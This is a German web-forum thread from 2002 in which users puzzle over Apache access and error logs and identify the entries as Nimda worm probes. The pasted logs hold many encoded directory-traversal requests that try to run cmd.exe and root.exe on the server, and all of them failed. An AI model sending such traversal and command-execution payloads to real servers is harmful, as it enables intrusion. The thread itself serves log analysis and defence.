# Apache => access.log W I C H T I G



## Tim C. (21. Januar 2002)

Also folgendes, ich habe zur Zeit nen Apache Webserver auf meinem Rechner laufen. Und zwar habe ich im Ordner htdocs einen Ordner /geb_pics/ in dem eine Bild Gallerie liegt. Ist auch alles schön und gut, jetzt habe ich eben in meine access.log geguckt und sehe dort folgendes:


```
217.82.194.244 - - [20/Jan/2002:23:38:14 +0100] "GET /geb_pics/IMG_1347.htm HTTP/1.1" 200 1006
217.82.194.244 - - [20/Jan/2002:23:38:29 +0100] "GET /geb_pics/IMG_1347.jpg HTTP/1.1" 200 169635
217.226.54.77 - - [21/Jan/2002:07:13:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.226.54.77 - - [21/Jan/2002:07:13:27 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.226.54.77 - - [21/Jan/2002:07:13:27 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.226.54.77 - - [21/Jan/2002:07:13:28 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.226.54.77 - - [21/Jan/2002:07:13:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.226.54.77 - - [21/Jan/2002:07:13:28 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.226.54.77 - - [21/Jan/2002:07:13:29 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.226.54.77 - - [21/Jan/2002:07:13:29 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217.226.54.77 - - [21/Jan/2002:07:13:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295
217.226.54.77 - - [21/Jan/2002:07:13:30 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.226.54.77 - - [21/Jan/2002:07:13:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.226.54.77 - - [21/Jan/2002:07:13:31 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.226.54.77 - - [21/Jan/2002:07:13:31 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.226.54.77 - - [21/Jan/2002:07:13:32 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.226.54.77 - - [21/Jan/2002:07:13:32 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.226.54.77 - - [21/Jan/2002:07:13:32 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.82.143.190 - - [21/Jan/2002:08:01:50 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.82.143.190 - - [21/Jan/2002:08:01:52 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.82.143.190 - - [21/Jan/2002:08:01:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.82.143.190 - - [21/Jan/2002:08:01:54 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.82.143.190 - - [21/Jan/2002:08:01:55 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.82.143.190 - - [21/Jan/2002:08:01:56 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.82.143.190 - - [21/Jan/2002:08:01:56 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
```
nur mal um einen kleinen Ausschnitt zu zeigen. Die ersten zwei Zeilen sind ja noch ok. Aber das danach ??? muss ich jetzt annehmen, dass jemand probiert hat über den port und die tatsache eines laufenden Apache meinen Rechner zu durchstöbern ??? wenn ja, wie kann ich das verhindern.

Was mich verwundert ist, dass von sieben IP's nur requests auf solche folder da sind. Alle anderen scheinen aber sich lieb und brav nur die pics angeguckt zu haben.

Bitte um Hilfe

<b>EDIT</b>
Ich sehe gerade in der error.log folgendes:


```
[Mon Jan 21 11:57:01 2002] [error] [client 217.82.143.190] File does not exist: c:/apache/htdocs/scripts/..Áœ/winnt/system32/cmd.exe
[Mon Jan 21 11:57:04 2002] [error] [client 217.82.143.190] File does not exist: c:/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe
[Mon Jan 21 11:57:05 2002] [error] [client 217.82.143.190] File does not exist: c:/apache/htdocs/scripts/..%2f/winnt/system32/cmd.exe
```

Also werden diejenigen leute wohl kein erfolgt gehabt haben, bei was immer sie probiert haben, aber was da genau los war, würde ich trotzdem gerne wissen.


----------



## Marcus Roffmann (21. Januar 2002)

Das sieht für mich so aus, also würde jemand versuchen, über Dein Apache - Windows-Commands- auszuführen.
Durch die Punkte hinter dem "scripts" und den Hexadezimalzeichen scheint jemand auf Deine Verzeichnisse reinkommen zu wollen.

Soweit ich informiert bin, geht das bei den neuen Versionen von Apache nicht mehr!

Berichtigt mich, wenn ich falsch liege.


----------



## Tim C. (21. Januar 2002)

jo scheint net mehr zu gehen, zeigt ja schon der auszug aus der errors.log
Was mich nur wundert. Ich habe die URL nur sehr sehr wenigen leuten gegeben. Und von denen traue ich keinem zu, dass er sowas kann, geschweige denn machen würde.


----------



## Marcus Roffmann (21. Januar 2002)

*hmmm* Ich hab grad mal meine Logs durchgeguckt: Genau das gleiche Problem. Hab jetzt Firewall auf blocken und habe seine route verfolgt. Der kommt irgendwo von der Telekom her!

Das gefällt mir ganz und garnicht!


----------



## Tim C. (21. Januar 2002)

ich glaube da steckt keine Böswilligkeit dahinter, weil. Ich hatte den nu 2 Stunden aus. Habe ihn wieder angemacht und genau 2 (in Worten ZWEI *G*) Leuten das gesagt und schonwieder hat ich son driet.

Ich glaube nicht, dass da ernsthaft was passieren kann, wenn der apache das net zulässt und meiner lässt es ja laut error.log das nicht zu.

Ich möchte ein Messaging System das an IP's senden kann  dann könnte man denen mal sagen, dass die sich mal geflegt ****** können


----------



## Marcus Roffmann (21. Januar 2002)

Also der Befehl:

```
net send IP Was soll das?
```
 wurde erfolgreich abgesendet. Solangsam habe ich aber das Gefühl, das das T-Online selber macht.
Weis auch nicht warum, aber scheint wohl so zu sein...


----------



## webmeister (22. März 2002)

Die hier registrierten Einträge im Error-Log stammen vom Nimda-Wurm.

Nimda Info 

Wobei versucht wird Zugriff auf die Eingabeaufforderung (DOS-Box) zu bekommen.

webmeister


----------



## Marcus Roffmann (22. März 2002)

Danke mal für den Hinweis. Das sind genau die Einträge die ich auch habe. Da scheint sich wohl ein Wurm einschleichen zu wollen.

Echt, danke für den Hinweis!


----------



## MIniMe_ (30. März 2002)

ist ja hochinteressant....
hab mal mir die logs von gestern bis heute durchgesehen, 3 solcher hübschen nimda angriffe.... 
da fällt mir ein...
ist das normal das meine access.log nach einem 3/4 monat auf 750MB und die error.log auf 500MB ansteigt?


----------

